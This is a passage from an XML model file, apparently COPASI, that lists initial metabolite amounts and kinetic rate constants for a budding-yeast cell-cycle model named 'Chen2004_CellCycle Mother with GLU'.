<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2]" value="2.879579509269514e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3]" value="2.994239436853977e+22" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ESP1]" value="2.159777877052535e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2]" value="1.056512290096014e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2P]" value="5.07527926009403e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5]" value="6.000645303884879e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5P]" value="2.417387190365045e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IE]" value="5.802510581936991e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IEP]" value="2.196294727685002e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[LTE1]" value="6.022141500000027e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MAD2]" value="6.022141499999998e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS]" value="5.128887707846334e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MCM1]" value="6.177542491684398e+21" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1]" value="2.019185755329673e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1P]" value="6.421153989171979e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1T]" value="1.686199200000007e+24" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ORI]" value="5.793351133464459e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PDS1]" value="1.093220582617615e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PE]" value="3.86236266090673e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PPX]" value="7.235672544851775e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENT]" value="8.274840214739905e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENTP]" value="1.964083420555222e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SBF]" value="7.496739071384451e+21" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1]" value="6.153793596801723e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1P]" value="3.151195626929545e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1T]" value="2.772876737281114e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SPN]" value="3.305249612645038e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SWI5]" value="5.446744061809811e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SWI5P]" value="7.393161906544548e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GDP]" value="1.263726206237145e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GTP]" value="4.758414978992805e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[GLU]" value="1.204428357999999e+21" type="Species" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Initial Global Quantities" type="Group">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[b0]" value="0.054" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[bub2h]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[bub2l]" value="0.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[C0]" value="0.4" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[CDC15T]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Dn3]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ebudb5]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ebudn2]" value="0.25" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ebudn3]" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1b2]" value="0.45" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1b5]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1k2]" value="0.03" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1n2]" value="0.06" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1n3]" value="0.3" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6b2]" value="0.55" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6b5]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6k2]" value="0.03" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6n2]" value="0.06" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6n3]" value="0.3" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhb2]" value="1.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhb5]" value="8" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhn2]" value="0.4" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhn3]" value="0.25" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eorib2]" value="0.45" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eorib5]" value="0.9" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[esbfb5]" value="2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[esbfn2]" value="2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[esbfn3]" value="10" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ESP1T]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[IET]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[J20ppx]" value="0.15" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jacdh]" value="0.03" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jaiep]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jamcm]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jasbf]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jatem]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jd2c1]" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jd2f6]" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jicdh]" value="0.03" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jiiep]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jimcm]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jisbf]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jitem]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jn3]" value="6" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jpds]" value="0.04" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jspn]" value="0.14" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka15']" value="0.002" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka15'']" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka15p]" value="0.001" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka20']" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka20'']" value="0.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kacdh']" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kacdh'']" value="0.8" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kaiep]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kamcm]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasb2]" value="50" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasb5]" value="50" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasbf]" value="0.38" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasesp]" value="50" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasf2]" value="15" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasf5]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasrent]" value="200" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasrentp]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kaswi]" value="2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd14]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd1c1]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd1f6]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd1pds']" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd20]" value="0.3" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd2c1]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd2f6]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd2pds'']" value="0.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3c1]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3f6]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3pds'']" value="0.04" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb2']" value="0.003" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb2'']" value="0.4" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb2p]" value="0.15" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb5']" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb5'']" value="0.16" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdbud]" value="0.06" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdcdh]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdib2]" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdib5]" value="0.06" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdiesp]" value="0.5" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdif2]" value="0.5" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdif5]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdirent]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdirentp]" value="2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdn2]" value="0.12" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdnet]" value="0.03" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdori]" value="0.06" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdppx']" value="0.17" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdppx'']" value="2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdspn]" value="0.06" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdswi]" value="0.08" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KEZ]" value="0.3" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KEZ2]" value="0.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ki15]" value="0.5" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kicdh']" value="0.001" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kicdh'']" value="0.08" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kiiep]" value="0.15" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kimcm]" value="0.15" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kisbf']" value="0.6" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kisbf'']" value="8" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kiswi]" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kkpnet']" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kkpnet'']" value="0.6" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppc1]" value="4" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppf6]" value="4" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppnet']" value="0.05" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppnet'']" value="3" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks14]" value="0.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks1pds'']" value="0.03" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks20']" value="0.006" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks20'']" value="0.6" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks2pds'']" value="0.055" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb2']" value="0.001" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb2'']" value="0.04" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb5']" value="0.0008" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb5'']" value="0.005" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksbud]" value="0.2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksc1']" value="0.012" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksc1'']" value="0.12" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kscdh]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksf6']" value="0.024" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksf6'']" value="0.12" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksf6''']" value="0.004" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksn2']" value="0" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksn2'']" value="0.15" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksnet]" value="0.08400000000000001" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksori]" value="2" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kspds']" value="0" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksppx]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksspn]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksswi']" value="0.005" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksswi'']" value="0.08" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[lte1h]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[lte1l]" value="0.1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mad2h]" value="8" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mad2l]" value="0.01" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mdt]" value="104.9622855759751" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[TEM1T]" value="1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[D]" value="123.3657116717321" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu]" value="0.0066037736960122" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5]" value="0.07089635273693944" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2]" value="0.4589400389952509" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vasbf]" value="0.4049487568106332" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Visbf]" value="0.7229242355857484" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpc1]" value="0.0623561288838139" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpf6]" value="0.06275343987480581" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vacdh]" value="0.2498295509602317" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vicdh]" value="0.009132056237052346" type="ModelValue" simulationType="assignment"/>
